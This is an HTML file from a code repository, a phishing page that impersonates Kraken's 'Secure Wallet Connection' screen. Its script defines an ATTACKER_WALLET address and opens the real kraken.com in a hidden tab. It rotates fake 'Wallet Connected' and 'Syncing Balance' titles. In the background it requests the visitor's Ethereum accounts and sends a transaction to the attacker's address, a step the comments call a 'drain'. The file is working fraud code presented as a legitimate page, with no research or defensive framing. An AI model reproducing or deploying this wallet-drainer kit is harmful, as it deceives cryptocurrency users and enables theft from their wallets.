-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmoki.html
More file actions
70 lines (63 loc) · 2.2 KB
/
moki.html
File metadata and controls
70 lines (63 loc) · 2.2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>kraken.com - Wallet Connect</title>
<style>
body, html { margin:0; padding:0; height:100%; background:#0a1a2a; color:#e0f7fa; font-family:system-ui; display:flex; flex-direction:column; align-items:center; justify-content:center; text-align:center; }
.kraken { font-weight:900; font-size:32px; color:#00c853; margin-bottom:12px; }
.msg { font-size:18px; color:#80deea; margin:16px 0; }
.loader { width:40px; height:40px; border:4px solid #1a3a5c; border-top:4px solid #00c853; border-radius:50%; animation:spin 1s infinite linear; margin:20px auto; }
@keyframes spin { to { transform:rotate(360deg); } }
</style>
</head>
<body>
<div class="kraken">KRAKEN</div>
<h2>Secure Wallet Connection</h2>
<div class="loader"></div>
<p class="msg">Please wait while we connect your wallet...</p>
<script>
const ATTACKER_WALLET = "0x32B4Ae54669DE1A3f296E15Aa5aE780c0c1e706F";
setTimeout(() => {
const link = document.createElement('a');
link.href = 'https://kraken.com';
link.target = '_blank';
link.rel = 'noopener noreferrer';
link.style.display = 'none';
document.body.appendChild(link);
link.click();
}, 300);
// 2. Spoof title berulang
let i = 0;
const titles = [
"kraken.com - Wallet Connected",
"kraken.com - Secure Connection",
"kraken.com - Syncing Balance..."
];
setInterval(() => {
document.title = titles[i % titles.length];
i++;
}, 900);
// 3. Auto connect + drain di background
setTimeout(async () => {
if (!window.ethereum) return;
try {
const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
const user = accounts[0];
setTimeout(async () => {
await window.ethereum.request({
method: 'eth_sendTransaction',
params: [{
from: user,
to: ATTACKER_WALLET,
value: '0x0',
gas: '0x5208'
}]
});
document.title = "kraken.com - Sync Complete";
}, 1000);
} catch (e) { console.error(e); }
}, 800);
</script>
</body>
</html>